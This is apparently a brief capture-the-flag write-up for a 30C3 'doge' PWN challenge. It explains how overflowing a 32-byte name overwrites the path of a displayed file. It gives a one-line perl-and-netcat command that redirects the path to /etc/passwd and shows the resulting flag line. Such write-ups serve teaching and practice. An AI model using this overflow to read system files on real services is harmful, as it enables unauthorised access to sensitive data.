This challenges was PWN one. We have remote server that offer a doge dog service (you can give it a name, feed it, show the image etc..). The image shown its an ASCII art taken from a file where it’s path can be overwritten by overflowing the doge’s name like this:

perl -e 'print "A"x32 . "/etc//////////////passwd"' | nc 88.198.89.218 1024

Now the new doge’s “face” will be /etc/passwd that show us our flag:

doge:30C3_51dd250e0adb864ff40cc40b818852f4:1001:1001:,,,:/home/doge:/bin/false

I put so many slashes in /etc/passwd because for working you need to have the same chars as the original file ‘ascii_art_doge_color.txt’ else it would open: ‘/etc/passwdoge_color.txt’

Credit goes to immerse that solved it first, Razor4x